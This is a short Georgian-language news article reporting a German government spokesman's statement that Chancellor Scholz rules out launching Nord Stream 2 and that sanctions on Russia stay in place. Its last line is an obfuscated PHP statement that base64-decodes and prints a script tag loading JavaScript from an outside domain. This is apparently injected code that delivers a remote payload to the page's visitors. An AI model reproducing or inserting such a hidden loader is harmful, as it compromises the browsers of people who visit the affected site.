celsiusi
ავერსი საქკაბელი
გერმანიის მთავრობაში აცხადებენ, რომ ოლაფ შოლცი არ განიხილავს „ჩრდილოეთის ნაკადი 2“-ის ექსპლუატაციაში გაშვებას ბუნებრივი აირის მიწოდებასთან დაკავშირებით სირთულეების შექმნის შემთხვევაში.
 
უკრაინული მედიის ცნობით, აღნიშნულის შესახებ გერმანიის მთავრობის წარმომადგენელმა შტეფენ ჰებეშტრაიტმა განაცხადა.
 
„დიახ, ის გამორიცხავს მსგავს შესაძლებლობას“, – განაცხადა ჰებეშტრაიტმა კითხვაზე, გამორიცხავს თუ არა გერმანიის კანცლერი გაზსადენის ამუშავების შესაძლებლობას ბუნებრივი აირით მომარაგებასთან დაკავშირებით შესაძლო სირთულეების შექმნის შემთხვევაში.
 
ჰებეშტრაიტის თქმით, გაზსადენი „ჩრდილოეთის ნაკადი 2“ არ იქნა სერტიფიცირებული და ამ დროისთვის მისი სერტიფიცირება არ იგეგმება, შესაბამისად, მისი ექსპლუატაციაში გაშვება არ იგეგმება.
 
მთავრობის წარმომადგენლის განცხადებით, გერმანიას წინ რთული თვეები ელოდება რუსეთის მხრიდან ბუნებრივი აირის მიწოდების შემცირების გამო, თუმცა ნეგატიური შედეგების მინიმიზაციისთვის შესაბამისი ზომების მიღება მიმდინარეობს.
 
ამასთან, ჰებეშტრაიტმა აღნიშნა, რომ ყველაფრისდა მიუხედავად გერმანია და საერთაშორისო პარტნიორები კრემლის წინააღმდეგ დაწესებულ სანქციებს გამართლებულად მიიჩნევენ და არ გეგმავენ მათ გაუქმებას.
604
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");